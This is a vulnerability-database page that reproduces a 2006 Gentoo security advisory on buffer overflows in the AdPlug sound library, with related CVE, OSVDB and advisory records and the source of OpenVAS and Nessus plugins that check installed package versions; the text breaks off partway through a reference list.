Search...

AdPlug: Multiple vulnerabilities

2006-09-12T00:00:00

ID GLSA-200609-06
Type gentoo
Reporter Gentoo Foundation
Modified 2006-09-12T00:00:00

Description

Background

AdPlug is a free, cross-platform, and hardware-independent AdLib sound player library.

Description

AdPlug is vulnerable to buffer and heap overflows when processing the following types of files: CFF, MTK, DMO, U6M, DTM, and S3M.

Impact

By enticing a user to load a specially crafted file, an attacker could execute arbitrary code with the privileges of the user running AdPlug.

Workaround

There are no known workarounds at this time.

Resolution

All AdPlug users should update to the latest version:

 # emerge --sync
 # emerge --ask --oneshot --verbose "&gt;=media-libs/adplug-2.0.1"

JSON Vulners Source

Initial Source

{"published": "2006-09-12T00:00:00", "id": "GLSA-200609-06", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "enchantments": {"score": {"value": 7.2, "vector": "NONE", "modified": "2016-09-06T19:46:53", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3582", "CVE-2006-3581"]}, {"type": "openvas", "idList": ["OPENVAS:57884", "OPENVAS:57850"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200607-13.NASL", "GENTOO_GLSA-200609-06.NASL"]}, {"type": "gentoo", "idList": ["GLSA-200607-13"]}, {"type": "osvdb", "idList": ["OSVDB:27044", "OSVDB:27047", "OSVDB:27043", "OSVDB:27046", "OSVDB:27042", "OSVDB:27045"]}, {"type": "exploitdb", "idList": ["EDB-ID:28181"]}], "modified": "2016-09-06T19:46:53", "rev": 2}, "vulnersScore": 7.2}, "description": "### Background\n\nAdPlug is a free, cross-platform, and hardware-independent AdLib sound player library. \n\n### Description\n\nAdPlug is vulnerable to buffer and heap overflows when processing the following types of files: CFF, MTK, DMO, U6M, DTM, and S3M. \n\n### Impact\n\nBy enticing a user to load a specially crafted file, an attacker could execute arbitrary code with the privileges of the user running AdPlug. \n\n### Workaround\n\nThere are no known workarounds at this time. \n\n### Resolution\n\nAll AdPlug users should update to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/adplug-2.0.1\"", "type": "gentoo", "lastseen": "2016-09-06T19:46:53", "edition": 1, "title": "AdPlug: Multiple vulnerabilities", "href": "https://security.gentoo.org/glsa/200609-06", "modified": "2006-09-12T00:00:00", "bulletinFamily": "unix", "viewCount": 2, "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "affectedPackage": [{"packageVersion": "2.0.1", "packageName": "media-libs/adplug", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}], "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3582", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3581", "http://www.securityfocus.com/archive/1/439432/30/0/threaded", "https://bugs.gentoo.org/show_bug.cgi?id=139593"], "reporter": "Gentoo Foundation", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:27:22", "description": "Multiple heap-based buffer overflows in Audacious AdPlug 2.0 and earlier allow remote user-assisted attackers to execute arbitrary code via the size specified in the package header of (1) CFF, (2) MTK, (3) DMO, and (4) U6M files.", "edition": 6, "cvss3": {}, "published": "2006-07-13T19:05:00", "title": "CVE-2006-3582", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3582"], "modified": "2018-10-18T16:48:00", "cpe": ["cpe:/a:audacious_media_player_team:adplug:2.0"], "id": "CVE-2006-3582", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3582", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:audacious_media_player_team:adplug:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:22", "description": "Multiple stack-based buffer overflows in Audacious AdPlug 2.0 and earlier allow remote user-assisted attackers to execute arbitrary code via large (1) DTM and (2) S3M files.", "edition": 6, "cvss3": {}, "published": "2006-07-13T19:05:00", "title": "CVE-2006-3581", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-3581"], "modified": "2018-10-18T16:48:00", "cpe": ["cpe:/a:audacious_media_player_team:adplug:2.0"], "id": "CVE-2006-3581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3581", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:audacious_media_player_team:adplug:2.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200607-13.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57850", "href": "http://plugins.openvas.org/nasl.php?oid=57850", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200607-13 (audacious)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The adplug library included in Audacious is vulnerable to various overflows\nthat could result in the execution of arbitrary code.\";\ntag_solution = \"All Audacious users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/audacious-1.1.0'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200607-13\nhttp://bugs.gentoo.org/show_bug.cgi?id=139957\nhttp://www.securityfocus.com/archive/1/439432/30/0/threaded\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200607-13.\";\n\n \n\nif(description)\n{\n script_id(57850);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200607-13 (audacious)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-sound/audacious\", unaffected: make_list(\"ge 1.1.0\"), vulnerable: make_list(\"lt 1.1.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200609-06.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57884", "href": "http://plugins.openvas.org/nasl.php?oid=57884", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200609-06 (adplug)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple heap and buffer overflows exist in AdPlug.\";\ntag_solution = \"All AdPlug users should update to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/adplug-2.0.1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200609-06\nhttp://bugs.gentoo.org/show_bug.cgi?id=139593\nhttp://www.securityfocus.com/archive/1/439432/30/0/threaded\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200609-06.\";\n\n \n\nif(description)\n{\n script_id(57884);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200609-06 (adplug)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/adplug\", unaffected: make_list(\"ge 2.0.1\"), vulnerable: make_list(\"lt 2.0.1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "description": "### Background\n\nAudacious is a media player that has been forked from Beep Media Player. \n\n### Description\n\nLuigi Auriemma has found that the adplug library fails to verify the size of the destination buffers in the unpacking instructions, resulting in various possible heap and buffer overflows. \n\n### Impact\n\nAn attacker can entice a user to load a specially crafted media file, resulting in a crash or possible execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Audacious users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/audacious-1.1.0\"", "edition": 1, "modified": "2006-07-29T00:00:00", "published": "2006-07-29T00:00:00", "id": "GLSA-200607-13", "href": "https://security.gentoo.org/glsa/200607-13", "type": "gentoo", "title": "Audacious: Multiple heap and buffer overflows", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:07", "description": "The remote host is affected by the vulnerability described in GLSA-200609-06\n(AdPlug: Multiple vulnerabilities)\n\n AdPlug is vulnerable to buffer and heap overflows when processing the\n following types of files: CFF, MTK, DMO, U6M, DTM, and S3M.\n \nImpact :\n\n By enticing a user to load a specially crafted file, an attacker could\n execute arbitrary code with the privileges of the user running AdPlug.\n \nWorkaround :\n\n There are no known workarounds at this time.", "edition": 25, "published": "2006-09-15T00:00:00", "title": "GLSA-200609-06 : AdPlug: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "modified": "2006-09-15T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adplug"], "id": "GENTOO_GLSA-200609-06.NASL", "href": "https://www.tenable.com/plugins/nessus/22351", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200609-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22351);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_xref(name:\"GLSA\", value:\"200609-06\");\n\n script_name(english:\"GLSA-200609-06 : AdPlug: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200609-06\n(AdPlug: Multiple vulnerabilities)\n\n AdPlug is vulnerable to buffer and heap overflows when processing the\n following types of files: CFF, MTK, DMO, U6M, DTM, and S3M.\n \nImpact :\n\n By enticing a user to load a specially crafted file, an attacker could\n execute arbitrary code with the privileges of the user running AdPlug.\n \nWorkaround :\n\n There are no known workarounds at this time.\"\n );\n # http://www.securityfocus.com/archive/1/439432/30/0/threaded\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/439432/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200609-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All AdPlug users should update to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/adplug-2.0.1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/adplug\", unaffected:make_list(\"ge 2.0.1\"), vulnerable:make_list(\"lt 2.0.1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AdPlug\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200607-13\n(Audacious: Multiple heap and buffer overflows)\n\n Luigi Auriemma has found that the adplug library fails to verify the\n size of the destination buffers in the unpacking instructions,\n resulting in various possible heap and buffer overflows.\n \nImpact :\n\n An attacker can entice a user to load a specially crafted media file,\n resulting in a crash or possible execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "GLSA-200607-13 : Audacious: Multiple heap and buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3581", "CVE-2006-3582"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:audacious"], "id": "GENTOO_GLSA-200607-13.NASL", "href": "https://www.tenable.com/plugins/nessus/22142", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200607-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22142);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3581\", \"CVE-2006-3582\");\n script_xref(name:\"GLSA\", value:\"200607-13\");\n\n script_name(english:\"GLSA-200607-13 : Audacious: Multiple heap and buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200607-13\n(Audacious: Multiple heap and buffer overflows)\n\n Luigi Auriemma has found that the adplug library fails to verify the\n size of the destination buffers in the unpacking instructions,\n resulting in various possible heap and buffer overflows.\n \nImpact :\n\n An attacker can entice a user to load a specially crafted media file,\n resulting in a crash or possible execution of arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://www.securityfocus.com/archive/1/439432/30/0/threaded\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/439432/30/0/threaded\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200607-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Audacious users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-sound/audacious-1.1.0'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:audacious\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-sound/audacious\", unaffected:make_list(\"ge 1.1.0\"), vulnerable:make_list(\"lt 1.1.0\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Audacious\");\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted U6M files when unpacking them resulting in an heap overflow. A length value read directly in the header of the U6M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS 05 Jul 2006 or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted U6M files when unpacking them resulting in an heap overflow. A length value read directly in the header of the U6M file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27047", "id": "OSVDB:27047", "title": "AdPlug u6m.cpp U6M File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted CFF files when unpacking them resulting in an heap overflow. A length value read directly in the header of the CFF file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the CFF file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS (2006-07-05) or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted CFF files when unpacking them resulting in an heap overflow. A length value read directly in the header of the CFF file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the CFF file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27043](https://vulners.com/osvdb/OSVDB:27043)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200609-06.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0108.html\n[CVE-2006-3582](https://vulners.com/cve/CVE-2006-3582)\n", "modified": "2006-07-06T07:48:59", "published": "2006-07-06T07:48:59", "href": "https://vulners.com/osvdb/OSVDB:27042", "id": "OSVDB:27042", "title": "AdPlug cff.cpp CFF File Unpacking Overflow", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:23", "bulletinFamily": "software", "cvelist": ["CVE-2006-3582"], "edition": 1, "description": "## Vulnerability Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted MTK files when unpacking them resulting in an heap overflow. A length value read directly in the header of the MTK file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## Solution Description\nUpgrade to version CVS (2006-07-05) or higher, as it has been reported to fix this vulnerability.\n## Short Description\nA local overflow exists in AdPlug . AdPlug fails to handle specialy crafted MTK files when unpacking them resulting in an heap overflow. A length value read directly in the header of the MTK file is not properly checked or sanitized when being used to allocate a buffer. A heap overflow could occur while unpacking the file allowing for the execution of arbitrary code.\n## References:\nVendor URL: http://adplug.sourceforge.net/\n[Vendor Specific Advisory URL](http://www.gentoo.org/security/en/glsa/glsa-200607-13.xml)\n[Secunia Advisory ID:21869](https://secuniaresearch.flexerasoftware.com/advisories/21869/)\n[Secunia Advisory ID:21295](https://secuniaresearch.flexerasoftware.com/advisories/21295/)\n[Secunia Advisory ID:20972](https://secuniaresearch.flexerasoftware.com/advisories/20972/)\n[Secunia Advisory ID:21238](https://secuniaresearch.flexerasoftware.com/advisories/21238/)\n[Related OSVDB ID: 27042](https://vulners.com/osvdb/OSVDB:27042)\n[Related OSVDB ID: 27047](https://vulners.com/osvdb/OSVDB:27047)\n[Related OSVDB ID: 27046](https://vulners.com/osvdb/OSVDB:27046)\n[Related OSVDB ID: 27044](https://vulners.com/osvdb/OSVDB:27044)\n[Related OSVDB ID: 27045](https://vulners.com/osvdb/OSVDB:27045)\nOther Advisory URL: http://aluigi.altervista.org/adv/adplugbof-adv.txt\nOther Advisory URL: 